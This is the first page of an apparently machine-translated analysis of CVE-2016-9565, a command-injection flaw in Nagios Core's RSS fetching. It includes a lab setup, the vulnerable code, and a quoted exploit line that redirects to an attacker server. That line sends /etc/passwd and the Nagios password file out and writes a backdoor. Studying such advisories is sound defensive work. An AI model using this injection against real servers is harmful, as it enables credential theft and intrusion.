The Nagios Core code execution vulnerability, CVE-2016-9565 analysis-vulnerability warning-the black bar safety net

ID MYHACK58:62201682159
Type myhack58
Reporter 佚名
Modified 2016-12-17T00:00:00


Author: p0wd3r, dawu (know Chong Yu 404 security lab)

Date: 2016-12-15

0x00 vulnerability overview

1. Vulnerability description

Nagios is a monitoring of the IT infrastructure program, recently security researchers Dawid Golunski found in Nagios Core there is a code execution vulnerability: an attacker first in the disguise of RSS feeds, when victimization the app to get the RSS information when the attacker would construct a malicious data to the victim, the program in the process will be the malicious data is injected into the curl command, and then code execution.

2. Vulnerability

The vulnerability is triggered premise:

  1. The attacker can be disguised as https://www. nagios. org, using dns spoofing and other methods
  2. The attacker is authorized, 或者攻击者诱使授权用户访问rss-corefeed.php, rss-newsfeed. php and rss-corebanner. php one file.

A successful attack execute arbitrary code.

3. Impact version

Nagios Core < 4.2.2

0x01 vulnerability reproduction

1. Environment to build


FROM quantumobject/docker-nagios

RUN sed-i '99d' /usr/local/nagios/share/includes/rss/rss_fetch. inc

RUN mkdir /tmp/tmp && chown www-data:www-data /tmp/tmp

Then run:

docker run-p 80:80 --name nagios-d quantumobject/docker-nagios

Visit with nagiosadmin:admin log in

2. Vulnerability analysis

Vulnerability trigger point in/usr/local/nagios/share/includes/rss/extlib/Snoopy. class. inc the 657 line, the _httpsrequest function:

// version < 4.2.0 exec($this->curl_path." -D \"/tmp/$headerfile\"". escapeshellcmd($cmdline_params)." ". escapeshellcmd($URI),$results,$return);

// vserion >= 4.2.0 && version < 4.2.2 exec($this->curl_path." -D \"/tmp/$headerfile\"".$ cmdline_params." \"". escapeshellcmd($URI)."\"",$ results,$return);

Where the use of the escapeshellcmd to the command parameter processing, escapeshellcmd of the role are as follows:

! Alt text

The author is intended to prevent multiple execution of the command, but this treatment did not prevent the implantation of a plurality of parameter samples if the$URI controlled, and then with the curl of some characteristics can read and write files, and then code execution. (In General to prevent the injection of a plurality of parameters to be usedescapeshellarg, but the function is not absolutely secure, see the CVE-2015-4642 only.

Because before the burst of the CVE-2008-4796, the code in the 4. 2. 0 version did change, but the patch can be bypassed, as long as we are in the input closed before and after".

Below we look at the$URI is controllable. According to the code logic point of view, _httpsrequet is usr/local/nagios/share/includes/rss/rss_fetch. inc in the fetch_rss function call, 这样我们创建这样一个测试文件test.php to:

<? php define('MAGPIE_DIR', './ includes/rss/'); define('MAGPIE_CACHE_ON', 0); define('MAGPIE_CACHE_AGE', 0); define('MAGPIE_CACHE_DIR', '/tmp/magpie_cache'); require_once(MAGPIE_DIR.'rss_fetch. inc');

fetch_rss(' --version');

Visit php after turn on dynamic debugging, we in the exec function at the lower breakpoint, the call stack is as follows:

! Alt text

$URI as follows:

! Alt text

Shows the$URI controlled, and in the incoming process has not been filtered.

Next we need to construct the curl parameters to get the results we want, here we use Dawid Golunski provide the Exp, it is noted that he provided the code to verify that 4. 2. 0 before version to verify the version greater than or equal to 4. 2. 0 and less than 4. 2. 2, The need for which code is about to change, coupled with the closure needed to double the quotes:

Line 44

self. redirect('https://' + self. request. host + '/nagioshack" -Fpasswd=@/etc/passwd-Fgroup=@/etc/group-Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii ' + backdoor_path + '"', permanent=False)

The Exp of the specific process is as follows:

  1. The attacker on the server to open a http/https Server
  2. Victims using fetch_rss to the server to send its request
  3. The attacker receives the request to redirect, redirect url to https:// + the attacker's server + payload, the payload in the use-F the file content is sent to the server, the--trace-ascii will flow records to the file, similar to Roundcube RCE in the mail function of-X is.
  4. The server receives the redirected request after the following three operations:

  5. Parse the file content

  6. Return to the back door content and then through the flow record is written to the backdoor file
  7. Returns the constructed XML in the description in the Add<img src=backdoor. php>
  8. Victims parse the XML and the description of the contents of the output to html, and then automatically performs back door

In order to facilitate verification, 我们在网站目录下创建一个exp.php:

<? php define('MAGPIE_DIR', './ includes/rss/'); define('MAGPIE_CACHE_ON', 0); define('MAGPIE_CACHE_AGE', 0); define('MAGPIE_CACHE_DIR', '/tmp/magpie_cache'); require_once(MAGPIE_DIR.'rss_fetch. inc');


[1] [2] next